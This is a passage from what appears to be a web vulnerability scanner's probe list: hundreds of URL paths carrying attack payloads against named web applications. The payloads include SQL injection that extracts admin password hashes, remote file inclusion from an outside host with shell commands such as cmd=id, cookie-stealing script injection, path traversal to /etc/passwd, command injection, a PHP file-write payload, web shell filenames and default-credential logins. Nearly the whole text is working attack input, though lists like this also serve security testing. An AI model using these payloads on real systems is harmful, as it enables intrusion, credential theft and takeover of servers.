[]=53&arrs2[]=40&arrs2[]=51&arrs2[]=51&arrs2[]=51&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
plus/en_search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
plus/feedback_js.php?arcurl=%27
plus/fr_search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
plus/list.php?tid=6&TotalResult=%3Ciframe%20src=http://www.baidu.com%3E&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2
plus/mytag_js.php?aid=9014
plus/nvs.php
plus/outside.php?id=../robots.txt%00
plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\x5C%27%20or%20mid=@`\x5C%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,md5(333),0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\x5C%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
plus/recommend.php?aid=1&action=sendmail&title=<script>alert(123)</script>
plus/search.php?keyword=as&typeArr[111%3D@%60\x5C%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,md5(333),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\x5C%27%60+]=a
plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.baidu.com%3E&PageNo=2
plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.yxlink.com/nvs_test.txt
pm/lib.inc.php?pm_path=http://www.yxlink.com/nvs_test.txt
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
pma/index.php
pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http://www.yxlink.com/nvs_test.txt?
pmd_pdf.php?db=>\x22><script>alert(3333)</script>
pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.yxlink.com/nvs_test.txt
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/login.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/archive_cat.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/recent_list.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
poll/poll.php?SITE_Path=http://www.yxlink.com/nvs_test.txt
poll/view.php?int_path=http://www.yxlink.com/nvs_test.txt
poll/view_polls.php?SITE_Path=http://www.yxlink.com/nvs_test.txt
pollit/Poll_It_SSI_v2.0.cgi?data_dir=\x5Cetc\x5Cpasswd%00
polls.php?action=newpoll&tid=1&polloptions='
pollvote.php?pollname=http://www.yxlink.com/nvs_test.txt?&cmd=ls
pop.php?base=http://www.yxlink.com/nvs_test.txt
popup_window.php?site_isp_root=http://www.yxlink.com/nvs_test.txt
port.php?content=http://www.yxlink.com/nvs_test.txt
portal/includes/portal_block.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&df_next_page=htdocs/forums.jsp&RowKeyValue=<script>alert(1111</script>
portal/portal.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
portfolio.php?id=http://www.yxlink.com/nvs_test.txt
portfolio/commentaires/derniers_commentaires.php?rep=http://www.yxlink.com/nvs_test.txt?
post.php?fid=10\x22><script>alert(111)</script>
post.php?fid=10\x22><script>alert(222);</script>
post_static_0-11/_lib/fckeditor/upload_config.php?DDS=http://www.yxlink.com/nvs_test.txt
postinfo.html
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\x5C\x22%3<script>alert('Vulnerable')</script>
prepare.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
prepend.php?_PX_config[manager_path]=http://www.yxlink.com/nvs_test.txt
preview.php?php_script_path=http://www.yxlink.com/nvs_test.txt?&cmd=dir
principal.php?conteudo=http://www.yxlink.com/nvs_test.txt
print.php?page=http://www.yxlink.com/nvs_test.txt
print.php?pager=http://www.yxlink.com/nvs_test.txt
print.php?print=http://www.yxlink.com/nvs_test.txt?
printenv
printenv.tmp
printview.php?t={existing_topic's_id}&order_sql=UNION%20SELECT%201%20,%20md5(333)%20,%201,%201,%201,%201,%201,%201,%201,%201,%201,%201%20FROM%20{phpbb_users_table}%20WHERE%20user_id%20={some_user's_id}%20ORDER%20BY%20t.topic_id%20ASC
private.php?acuparam=>\x22><ScRiPt>alert(2222)</ScRiPt>
privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND20%pm.privmsgs_type=-9920%UNION20%SELECT20%0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,md5(333)20%FROM20%phpbb_users20%WHERE20%user_id=220%LIMIT20%1/*
process.php?DEFAULT_SKIN=http://www.yxlink.com/nvs_test.txt
product/class/?1'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/*.html
products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,md5(333),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
professeurs/index.php?repertoire_config=http://www.yxlink.com/nvs_test.txt
profil.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
profile.php?action=forumright\x22><script>alert(111);</script>
profile.php?action=forumright\x22><script>alert(111)</script>
profile.php?acuparam=>\x22><ScRiPt>alert(2222)</ScRiPt>
profile.php?mode=viewprofile&u='
profile.php?u=JUNK(8)
profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
profiles/html/simpleSearch.do?name=<IMG%20SRC=\x22vbscript:msgbox(document.cookie)'>&lang=en
projects/weatimages/demo/index.php?ini[langpack]=http://www.yxlink.com/nvs_test.txt
promocms/newspublish/include.php?path[bdocroot]=http://www.yxlink.com/nvs_test.txt
protection.php?logout_page=http://www.yxlink.com/nvs_test.txt?
provider/auth.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
proxy/smhui/getuiinfo?JS&servercert=%0064e43<script>alert(1)</script>7b3f58a689f
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
psynch/nph-psa.exe?css=http://www.yxlink.com/nvs_test.txt
psynch/nph-psf.exe?css=http://www.yxlink.com/nvs_test.txt
public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=http://www.yxlink.com/nvs_test.txt?
public_html/lists/admin/?num=\x22><script>alert(222)</script>&option=bounces&page=reconcileusers
public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://www.yxlink.com/nvs_test.txt?
public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.yxlink.com/nvs_test.txt
public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://www.yxlink.com/nvs_test.txt
publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
pwciasservices/Staging/CitiPayPro.nsf/Footer?OpenForm&BaseTarget=\x22;+alert(111);+var+mit=\x22a
pwciasservices/Staging/CitiPayPro.nsf/SubPayrollExceptionsFS?OpenFrameSet&Frame=Main&Src=a\x22></FRAMESET><script>alert(111)</script>
pwnshell.php
pws.php
q.php
qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=http://www.yxlink.com/nvs_test.txt?
qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=http://www.yxlink.com/nvs_test.txt?
qte_web.php?qte_web_path=http://www.yxlink.com/nvs_test.txt?
query?mss=%2e%2e/config
quick_reply.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt&mode=[file]
quickie.php?QUICK_PATH=http://www.yxlink.com/nvs_test.txt?&cmd=id
r.php
r00t.php
r3za.php
random2.php?path_to_folder=http://www.yxlink.com/nvs_test.txt
randshop/index.php?incl=http://www.yxlink.com/nvs_test.txt?
rdf.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
reactivate.php?base_dir=http://www.yxlink.com/nvs_test.txt
read.php?data=http://www.yxlink.com/nvs_test.txt? 
read.php?nowtime=\x22><script>alert(111)</script>
read.php?nowtime=\x22><script>alert(222);</script>
readme.html
readmore.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
recent.php?insPath=http://www.yxlink.com/nvs_test.txt
rechnung.php?_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt
rechnung.php?_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt?
reconfig.php?GLOBALS[CLPath]=http://www.yxlink.com/nvs_test.txt
redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.yxlink.com/nvs_test.txt
redaxo_path/include/addons/version/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.yxlink.com/nvs_test.txt
redaxo_path/include/pages/specials.inc.php?subpage=lang&REX[INCLUDE_PATH]=http://www.yxlink.com/nvs_test.txt
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
redirect.php?url=http://www.yxlink.com/nvs_test.txt
redsys/404.php?REDSYS[MYPATH][TEMPLATES]=http://www.yxlink.com/nvs_test.txt
register.php?acuparam=>\x22><ScRiPt>alert(2222)</ScRiPt>
register.php?base_dir=http://www.yxlink.com/nvs_test.txt
register.php?myaction=getpasswd&username=\x22><script>alert(1);</script>
register.txt
registration.txt
releasenote.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt 
rempass.php?lang=http://www.yxlink.com/nvs_test.txt
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
report.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter=save&Page=rep
reports/rwservlet/showenv?server=reptest&debug=<script>alert(222);</script>
reports/temp/
reports/who_r.php?bj=http://www.yxlink.com/nvs_test.txt
res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
resin-admin/digest.php?digest_attempt=1&digest_realm=\x22><script>alert(222)</script><a&digest_username[]=
resin-admin/digest.php?digest_attempt=1&digest_username=\x22><script>alert(111)</script><a
resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert(222)>
resourceNode/resources.jsf?');};alert(222);</script><!--
resources/
resources/includes/class.Smarty.php?cfg[sys][base_path]=http://www.yxlink.com/nvs_test.txt
respond.php?code=tenpay&attach=voucher&sp_billno=1%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%28333%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%201=1
ressourcen/dbopen.php?home=http://attacker.com/http://www.yxlink.com/nvs_test.txt?
ressourcen/dbopen.php?home=http://www.yxlink.com/nvs_test.txt?
revize/debug/query_results.jsp?webspace=REVIZE&query=select%20md5(333)%20from%20pbpublic.rSubjects
robots.txt
robotstats.inc.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
rolis_book_path/insert.inc.php?path=http://www.yxlink.com/nvs_test.txt
root.php
root/
root/public/code/cp_html2txt.php?page=http://www.yxlink.com/nvs_test.txt
rootnull.php
rootshell v2.0.php
routines/fieldValidation.php?jssShopFileSystem=http://www.yxlink.com/nvs_test.txt
rpc.php?q='&t='
rpc.php?q=\x5C\x22><script>alert(document.cookie)</script>
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rspa/framework/Controller_v4.php?__ClassPath=http://www.yxlink.com/nvs_test.txt
rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://www.yxlink.com/nvs_test.txt
rss.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
rss.php?phpraid_dir=http://www.yxlink.com/nvs_test.txt
rss.php?premodDir=http://www.yxlink.com/nvs_test.txt
rss2.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
rtm.log
run.php?dir=SHELL?&file=http://www.yxlink.com/nvs_test.txt
s.php
s01.php?shopid=http://www.yxlink.com/nvs_test.txt
s02.php?shopid=http://www.yxlink.com/nvs_test.txt?
s03.php?shopid=http://www.yxlink.com/nvs_test.txt?
s04.php?shopid=http://www.yxlink.com/nvs_test.txt?
sablonlar/gunaysoft/gunaysoft.php?icerikyolu=http://www.yxlink.com/nvs_test.txt
sablonlar/gunaysoft/gunaysoft.php?sayfaid=http://www.yxlink.com/nvs_test.txt
saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=http://www.yxlink.com/nvs_test.txt
safer.php
saiy060118.php
samples/search.dll?query=<script>alert(document.cookie)</script>
sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>
sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>
sap/bc/gui/sap/its/webgui/aaaaaaa\x22><img/src=javascript:alert('DSECRG_XSS')>
save.php?file_save=http://www.yxlink.com/nvs_test.txt
saveserver.php?thisdir=http://www.yxlink.com/nvs_test.txt
sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
sca/menu.jsp
scanner.php
scozbook/view.php?PG=whatever
scrape.php?info_hash=%22union%20select%201,1,1,1,md5(333)%20from%20users--
script-that-dont-has-to-exist.jsp?foobar=\x22/><script>alert(111)</script>
script//ident/index.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/_conf/core/common-tpl-vars.php?confdir=http://www.yxlink.com/nvs_test.txt?
script/common.inc.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/gestion/index.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/disconnect.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/ident.inc.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/identification.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/loginliste.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/loginmodif.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/index.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/init/createallimagecache.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
script/menu/menuadministration.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/menu/menuprincipal.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/param/param.inc.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/plugins/phpgacl/admin/index.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/template/index.php?main_page_directory=http://www.yxlink.com/nvs_test.txt
script/tick/allincludefortick.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
script/tick/test.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
script>alert('Vulnerable')</script>.cfm
script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
script_path/cms/classes/openengine/filepool.php?oe_classpath=http://www.yxlink.com/nvs_test.txt?
script_path/installation/index.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=http://www.yxlink.com/nvs_test.txt
scripts/
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
scripts/check-lom.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/gallery.scr.php?GLOBALS[PTH][func]=http://www.yxlink.com/nvs_test.txt?
scripts/iisadmin/ism.dll?http/dir
scripts/lom_update.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
scripts/news.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
scripts/no-such-file.pl
scripts/polls.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
scripts/repost.asp
scripts/root.exe?/c+dir+c:\x5C+/OG
scripts/rss.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
scripts/search.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
scripts/sitemap.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt
scripts/weigh_keywords.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=http://www.yxlink.com/nvs_test.txt?
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
search.asp?Search=
search.asp?Search=\x5C\x22>&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
search.asp?term=<%00script>alert('Vulnerable')</script>
search.php/>\x22><ScRiPt>alert(1111)</ScRiPt>
search.php?SearchFor=<script>alert(/farbodmahini/)</script>
search.php?action='
search.php?asc=desc\x22><script>alert(111);</script>
search.php?asc=desc\x22><script>alert(111)</script>
search.php?c=5&hit=1&s='/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
search.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
search.php?custom[%27)%20AND%20(SELECT%208734%20FROM(SELECT%20COUNT(*),CONCAT(md5(333),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23]=1
search.php?id=http://www.yxlink.com/nvs_test.txt
search.php?insPath=http://www.yxlink.com/nvs_test.txt
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
search.php?query=facked';?><?fputs(fopen('nvs_test.php','w'),base64_decode('VGVzdCBmb3IgbnZzX2tpbmdjbXM='));?>&modelid=1%20or%202=2
search.php?query=xsss%20%3Cscript%3Ealert('HELLO');%3C/script%3E&search=1
search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
search.php?searchfor=\x5C\x22><script>alert('Vulnerable');</script>
search.php?searchstring=<script>alert(document.cookie)</script>
search.php?searchword=<script>alert(1333)</script>
search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
search.php?zoom_query=<script>alert(\x5C\x22hello\x5C\x22)</script>
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
search/
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
search/?q=zhuba&type=all\x22><iframe src=HTTP://www.baidu.com>&page=1&order=
search/?term=%3Cbody%20onload=alert(document.cookie)%3E
search/SQLQHit.asp
search/htx/SQLQHit.asp
search/htx/sqlqhit.asp
search/inc/
search/index.cfm?<script>alert(\x5C\x22Vulnerable\x5C\x22)</script>
search/index.php?imageField.x=-1138&imageField.y=-319&key=1%27)and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
search/query/search?search.timezone=&search_p_groups=\x22'><IMG%20SRC=javascript:alert(document.cookie)>&q=1234&btnSearch=Search
search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
search/sqlqhit.asp
search/submit.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
search_wA.php?LIBPATH=http://www.yxlink.com/nvs_test.txt
searchbot.php?path=http://www.yxlink.com/nvs_test.txt
searchenginepath/site_searcher.cgi?page=|id|
secure/
secured/
security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://www.yxlink.com/nvs_test.txt
seeyon/main.do?method=officeDown&filename=c:/boot.ini
seeyon/management/status.jsp
sendmessage.php/>\x22><ScRiPt>alert(213771818860)</ScRiPt>
sendpage.pl?message=test\x5C;/bin/ls%20/etc;echo%20\x5Cmessage
sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://www.yxlink.com/nvs_test.txt?
sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=http://www.yxlink.com/nvs_test.txt?
senetman/html/index.php?page=http://www.yxlink.com/nvs_test.txt
server_stats/
services.php?page=http://www.yxlink.com/nvs_test.txt
services/
services/samples/inclusionService.php?CabronServiceFolder=http://www.yxlink.com/nvs_test.txt%00
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
servlet/IsItWorking
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
servlet/SnoopServlet
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&
servlet/com.newatlanta.servletexec.JSP10Servlet/
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../WEB-INF/web.xml
servlet/com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
servlet/webacc?User.html=noexist
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
setpasswd.cgi
settings.php?P[includes]=http://www.yxlink.com/nvs_test.txt
settings/site.ini
settings_sql.php?path=http://www.yxlink.com/nvs_test.txt
setup.cgi?user_list=1&sysname=admin&sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http_wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=\x22><script>history.back()</script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=http://tinyurl.com/36sjzw
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
setup/header.php?css_path=http://www.yxlink.com/nvs_test.txt
setup/inc/database.php?tcms_administer_site=http://www.yxlink.com/nvs_test.txt
setup/upgrader.php?RootDirectory=http://www.yxlink.com/nvs_test.txt
sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
sezhoo/SezHooTabsAndActions.php?IP=http://www.yxlink.com/nvs_test.txt
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
sh0w.php
share.php?F_email=1%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
she11.php
shell.php
shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
shop.pl/page=;cat%20shop.pl|
shop/includes/header.inc.php?dateiPfad=http://www.yxlink.com/nvs_test.txt
shop/index.php?action=http://www.yxlink.com/nvs_test.txt?&cmd=cat%20config.php
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
shop/normal_html.cgi?file=&lt;script&gt;alert(\x5C\x22Vulnerable\x5C\x22)&lt;/script&gt;
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/page.php?osCsid=http://www.yxlink.com/nvs_test.txt?
shop/page.php?pageid=http://www.yxlink.com/nvs_test.txt?
shopadmin.asp?Password=abc&UserName=\x5C\x22><script>alert(foo)</script>
shopadmin/index.php?ctl=passport&act=login&sess_id=1'and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
shopdbtest.asp
shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
shopexd.asp?catalogid='42
shopgiftregsearch.asp?LoginLastname='%20union%20select%200,8888-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
